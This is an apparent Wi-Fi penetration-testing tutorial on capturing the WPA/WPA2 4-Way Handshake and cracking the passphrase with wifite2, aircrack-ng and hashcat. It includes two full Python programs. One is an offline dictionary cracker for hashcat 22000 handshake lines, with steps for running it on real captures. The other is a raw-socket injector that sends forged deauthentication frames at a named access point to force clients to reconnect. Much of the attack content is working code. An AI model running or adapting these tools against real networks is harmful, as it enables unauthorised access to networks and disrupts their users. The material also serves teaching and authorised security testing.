Capture the 4-Way Handshake
Theoretical background
In the WPA/WPA2 section of this book, we covered the authentication flow and the 4-Way Handshake between the access point and the client that derives the PTK used to encrypt data. With that in mind, we can now see how capturing the 4-Way Handshake lets an attacker recover the Wi-Fi passphrase.
Eavesdropping on a 4-Way Handshake gives an attacker everything needed to recompute the PTK except the PMK: the ANonce, the SNonce, and the MAC addresses of the access point and the client. In WPA/WPA2-PSK the PMK is derived deterministically from the passphrase and the SSID (PBKDF2-HMAC-SHA1, 4096 iterations), so guessing the correct passphrase yields the correct PMK.
Whether a guess is correct can be checked without any further traffic, which is what a dictionary attack does: for each candidate passphrase, derive the PMK, derive the PTK, use the KCK part of the PTK to compute the MIC over the captured EAPOL frame, and compare it with the MIC the client actually sent. If the two MICs match, the PTK was correct, so the PMK and therefore the passphrase were correct too.
Not all four packets of the 4-Way Handshake are needed for the dictionary attack. At minimum we need message 2, which carries the SNonce (supplicant nonce) and a MIC computed by the client, together with either message 1 or message 3, both of which carry the ANonce (access point nonce). The SSID must also be known, since it is the salt of the PMK derivation; airodump-ng records it in the capture.
wifite2
Wifite2 is a handy tool that can perform various attacks on wireless networks configured with WEP or WPA/WPA2-PSK. Its advantage is that it automates the whole process: monitoring the networks in range, capturing the 4-way handshake, and then cracking the key.
PMKID attack
Capture 4-way handshake
WPS attacks
Requires the entire aircrack-ng suite installed
--no-pmkid: do not run the PMKID attack.
--pmkid: only run the PMKID attack (skips WPS and handshake capture).
Cracking the hash from within wifite2
Wifite2 can crack the captured handshake itself, without the attacker starting any other tool: once the handshake is saved, it runs a dictionary attack over the supplied wordlist by calling aircrack-ng under the hood. This is still an offline attack against the captured .cap file; candidate keys are never sent to the AP, which would be slow and noisy.
The image below shows that wifite found several wireless networks in range. One client appears to be connected to the EvilCorp network.
Cracking the hash offline with hashcat
It is also possible to crack the key offline with hashcat. In an offline attack the attacker no longer interacts with the target (the AP) at all: everything needed to test a candidate passphrase is contained in the captured handshake, so the cracking can be moved to a separate GPU machine and run at any later time.
1. Capture the 4-way handshake
Once a 4-way handshake has been captured, the .cap file found in the /hs directory must be converted with hcxpcapngtool into a format hashcat understands.
2. Convert the 4-way handshake .cap file
3. Crack the hash offline using hashcat
For this hash format, use hash mode 22000 (WPA-PBKDF2-PMKID+EAPOL) in hashcat.
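The check described in the theoretical background above, and the hash-mode 22000 lines that hcxpcapngtool produces for step 2, fit together in a few dozen lines of Python. The following is an added example written for this page; it is not code from the original page nor from the aircrack-ng, hcxtools or hashcat projects. It derives the PMK from a candidate passphrase, expands it into the PTK, recomputes the MIC over the client's EAPOL frame with the KCK and compares it with the captured MIC, which is what hashcat does for every candidate, only far slower here. The capture is constructed: a handshake is forged from a known passphrase using the BSSID quoted on the page, a hypothetical client MAC and fixed nonces, then serialised into a 22000 line. Only the WPA2/CCMP MIC (key descriptor version 2, HMAC-SHA1-128) and the WPA/TKIP MIC (version 1, HMAC-MD5) are handled, not the AES-CMAC variant used with SHA-256 AKMs.

```python
import hashlib
import hmac
from typing import Optional


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    The 4096 iterations are what make each candidate expensive to test."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """802.11 PRF-512: PTK = PRF(PMK, "Pairwise key expansion",
    min(AA, SPA) || max(AA, SPA) || min(ANonce, SNonce) || max(ANonce, SNonce))."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):  # four 20-byte HMAC-SHA1 blocks, truncated to 64 bytes
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]  # KCK = bytes 0-15, KEK = 16-31, TK = 32-47 (CCMP)


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """MIC over the EAPOL-Key frame with its 16-byte MIC field (offset 81) zeroed.
    The key descriptor version (low 3 bits of Key Info at offset 5-6) selects the
    algorithm: 1 = HMAC-MD5 (WPA/TKIP), 2 = HMAC-SHA1-128 (WPA2/CCMP)."""
    version = eapol[6] & 0x07
    zeroed = eapol[:81] + bytes(16) + eapol[97:]
    if version == 1:
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    if version == 2:
        return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]
    raise ValueError(f"key descriptor version {version} (AES-CMAC) is not handled here")


def parse_22000(line: str) -> dict:
    """Parse a hashcat 22000 EAPOL line: WPA*02*MIC*MAC_AP*MAC_STA*ESSID*ANONCE*EAPOL*MESSAGEPAIR.
    WPA*01 lines carry a PMKID instead of a MIC and are not handled here."""
    f = line.strip().split("*")
    if len(f) != 9 or f[0] != "WPA" or f[1] != "02":
        raise ValueError("expected a WPA*02 (EAPOL) line")
    eapol = bytes.fromhex(f[7])
    return {
        "mic": bytes.fromhex(f[2]),
        "ap_mac": bytes.fromhex(f[3]),
        "sta_mac": bytes.fromhex(f[4]),
        "ssid": bytes.fromhex(f[5]).decode(),  # ESSID is hex-encoded in this format
        "anonce": bytes.fromhex(f[6]),
        "eapol": eapol,
        "snonce": eapol[17:49],                # Key Nonce field of the client's frame
        "messagepair": int(f[8], 16),          # low 3 bits: 0 = ANonce from M1, EAPOL from M2
    }


def crack(hs: dict, wordlist) -> Optional[str]:
    """Dictionary attack: the candidate whose KCK reproduces the captured MIC is the passphrase."""
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, hs["ssid"])
        kck = prf512(pmk, hs["ap_mac"], hs["sta_mac"], hs["anonce"], hs["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, hs["eapol"]), hs["mic"]):
            return candidate
    return None


def build_m2(snonce: bytes, mic: bytes) -> bytes:
    """EAPOL-Key message 2 as a WPA2/CCMP client sends it (constructed, simplified:
    replay counter 1, zero IV/RSC/ID, empty key data)."""
    body = (b"\x02"                        # descriptor type: RSN
            + (0x010A).to_bytes(2, "big")  # key info: MIC bit, pairwise, version 2
            + (16).to_bytes(2, "big")      # key length
            + (1).to_bytes(8, "big")       # replay counter
            + snonce + bytes(16) + bytes(8) + bytes(8)
            + mic + (0).to_bytes(2, "big"))
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body  # EAPOL v2, type EAPOL-Key


# Constructed capture: forged from a known passphrase so the example runs offline.
SSID, PASSPHRASE = "EvilCorp", "password"
AP_MAC = bytes.fromhex("b80df7d579f7")   # BSSID quoted on the page
STA_MAC = bytes.fromhex("001122334455")  # hypothetical client
ANONCE, SNONCE = bytes(range(32)), bytes(range(32, 64))
TRUE_KCK = prf512(pmk_from_passphrase(PASSPHRASE, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
TRUE_MIC = eapol_mic(TRUE_KCK, build_m2(SNONCE, bytes(16)))
HASH_LINE = "*".join(["WPA", "02", TRUE_MIC.hex(), AP_MAC.hex(), STA_MAC.hex(),
                      SSID.encode().hex(), ANONCE.hex(), build_m2(SNONCE, TRUE_MIC).hex(), "00"])

if __name__ == "__main__":
    print(crack(parse_22000(HASH_LINE), ["123456", "letmein", "password", "qwerty"]))  # password
```

To use it on a real capture, replace HASH_LINE with a line from the file written by hcxpcapngtool (for example `hcxpcapngtool -o hashes.22000 capture.cap`) and feed crack() a wordlist. The parser zeroes the MIC field itself before recomputing, so it does not matter whether the converter left the MIC in the EAPOL field or not. For anything beyond a handful of candidates the same computation belongs in `hashcat -m 22000 hashes.22000 wordlist.txt`: the 4096 PBKDF2 iterations dominate the cost, and a GPU tests candidates orders of magnitude faster than this loop.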
Using airodump and aireplay
Monitoring all wireless networks in range, we can see that the targeted NewGenAirways network runs on channel 6. The capture also shows a wireless client connected to the targeted network, whose BSSID is B8:0D:F7:D5:79:F7. We want to capture the handshake of a client connecting to this network in order to retrieve the key.
First, we lock airodump-ng on channel 6 and write its output to a file that will hold the captured handshake. This is done with the command below, with wlan0 in monitor mode.
We are now ready to perform a deauthentication attack from another terminal.
Performing a deauth attack
The goal of the deauth attack is to force connected clients to disconnect from the targeted access point and reconnect; the reconnection triggers a fresh 4-Way Handshake, which airodump-ng captures. Note that networks enforcing 802.11w (Protected Management Frames) reject forged deauthentication frames, so this technique only works against APs that do not require PMF.
The command below sends 50 deauthentication packets to the AP with BSSID B8:0D:F7:D5:79:F7.
-0 <count>: deauthentication attack, followed by the number of deauth frames to send (0 means keep sending until stopped)
-a: BSSID of the targeted access point
-c: MAC address of the targeted client; if omitted, the deauth frames are sent to the broadcast address
--ignore-negative-one: sometimes needed when the interface reports being on channel -1
The handshake will be captured by airodump-ng.
We can verify that the 4-way handshake was captured correctly by running aircrack-ng on the .cap file: it lists each BSSID seen together with the number of handshakes found for it.
We can now crack the key with aircrack-ng and a wordlist of common passwords.
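What the deauth attack actually puts on the air, as an added example written for this page (not the aireplay-ng code and not from the original page): a pure-Python builder for the 802.11 Deauthentication frame and a raw-socket injector for a Linux monitor-mode interface. The BSSID is the one quoted above; the client address in the usage line is a hypothetical argument. Building the frame by hand makes the weakness visible: it is 26 unauthenticated bytes, so any station that has not negotiated 802.11w accepts it from a spoofed AP address.

```python
import socket
import struct
from typing import List, Optional

BROADCAST = b"\xff" * 6
RADIOTAP_EMPTY = bytes([0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00])  # v0, length 8, no fields
REASON_CLASS3_FROM_NONASSOC = 7  # reason code aireplay-ng -0 uses


def mac(text: str) -> bytes:
    """'B8:0D:F7:D5:79:F7' -> 6 raw bytes."""
    return bytes.fromhex(text.replace(":", "").replace("-", ""))


def deauth_frame(receiver: bytes, transmitter: bytes, bssid: bytes, seq: int,
                 reason: int = REASON_CLASS3_FROM_NONASSOC) -> bytes:
    """Raw 802.11 Deauthentication frame (management type 0, subtype 12), 26 bytes.
    Nothing in it is authenticated unless the network enforces 802.11w, which is why
    a forged one carrying the AP's address as transmitter is accepted by the client."""
    frame_control = b"\xc0\x00"                         # subtype 0xC, type 0, no flags
    duration = struct.pack("<H", 0x013A)
    seq_ctrl = struct.pack("<H", (seq & 0x0FFF) << 4)   # sequence number, fragment 0
    return (frame_control + duration + receiver + transmitter + bssid + seq_ctrl
            + struct.pack("<H", reason))


def deauth_burst(bssid: bytes, client: Optional[bytes] = None, count: int = 50) -> List[bytes]:
    """The frames `aireplay-ng -0 count -a bssid [-c client]` transmits: with a client
    given, each round sends AP->client and client->AP; without one, AP->broadcast."""
    frames = []
    for seq in range(count):
        if client is None:
            frames.append(deauth_frame(BROADCAST, bssid, bssid, seq))
        else:
            frames.append(deauth_frame(client, bssid, bssid, seq))
            frames.append(deauth_frame(bssid, client, bssid, seq))
    return frames


def inject(iface: str, frames: List[bytes]) -> int:
    """Send frames on a monitor-mode interface (Linux only, needs CAP_NET_RAW). The
    driver expects a radiotap header in front of each 802.11 frame and adds the FCS."""
    sock = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(0x0003))
    sock.bind((iface, 0))
    sent = 0
    for frame in frames:
        sent += 1 if sock.send(RADIOTAP_EMPTY + frame) > 0 else 0
    sock.close()
    return sent


if __name__ == "__main__":
    import sys
    # usage: python3 deauth.py wlan0mon [client MAC]   (interface already on the AP's channel)
    bssid = mac("B8:0D:F7:D5:79:F7")
    client = mac(sys.argv[2]) if len(sys.argv) > 2 else None
    print(inject(sys.argv[1], deauth_burst(bssid, client)), "frames sent")
```

The interface must already be in monitor mode and locked to the AP's channel, exactly as for aireplay-ng; otherwise the frames go out on the wrong channel and nothing happens. Omitting the client address broadcasts the deauth to every client of the BSSID, which is louder but catches clients airodump-ng has not listed yet.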